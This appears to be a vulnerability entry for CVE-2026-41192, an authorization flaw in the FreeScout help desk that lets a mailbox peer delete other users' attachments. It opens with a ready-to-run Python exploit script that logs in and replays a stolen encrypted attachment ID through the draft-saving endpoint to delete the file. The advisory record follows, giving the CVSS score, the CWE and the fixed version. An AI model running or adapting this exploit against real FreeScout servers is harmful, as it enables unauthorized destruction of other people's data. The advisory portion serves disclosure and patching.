CVE-2026-41192

import requests # Configuration target_url = "https://example.com/freescout" login_email = "[email protected]" login_pass = "password" conversation_id = 123 # The encrypted ID obtained from viewing another user's conversation via load_attachments stolen_encrypted_id = "eyJpdiI6..." def login(): session = requests.Session() login_data = {"email": login_email, "password": login_pass} resp = session.post(f"{target_url}/login", data=login_data) if resp.status_code == 200: print("[+] Logged in successfully") return session return None def exploit_delete_attachment(session): # The vulnerability lies in the save_draft endpoint trusting the attachments_all parameter payload = { "conversation_id": conversation_id, "body": "This is a draft", "cc": "", "bcc": "", "attachments_all[]": [stolen_encrypted_id], # Malicious injection of stolen ID "attachments_retained": [] # Empty retained list forces deletion of IDs in 'all' } print(f"[*] Attempting to delete attachment using stolen ID: {stolen_encrypted_id}") resp = session.post(f"{target_url}/api/v1/drafts", data=payload) # Endpoint may vary based on implementation if resp.status_code == 200: print("[+] Request sent successfully. Check if attachment is deleted.") else: print(f"[-] Request failed with status {resp.status_code}") if __name__ == "__main__": s = login() if s: exploit_delete_attachment(s)

{"cve": {"id": "CVE-2026-41192", "sourceIdentifier": "[email protected]", "published": "2026-04-21T18:16:53.047", "lastModified": "2026-04-22T21:10:14.290", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.215, the reply and draft flows trust client-supplied encrypted attachment IDs. Any IDs present in `attachments_all[]` but omitted from retained lists are decrypted and passed directly to `Attachment::deleteByIds()`. Because `load_attachments` returns encrypted IDs for attachments on a visible conversation, a mailbox peer can replay those IDs through `save_draft` and delete the original attachment row and file. Version 1.8.215 fixes the vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/freescout-help-desk/freescout/commit/5f182818e2391f8e711fec6ae6648ac0b367bef5", "source": "[email protected]"}, {"url": "https://github.com/freescout-help-desk/freescout/releases/tag/1.8.215", "source": "[email protected]"}, {"url": "https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-cv36-2j23-x6g3", "source": "[email protected]"}]}}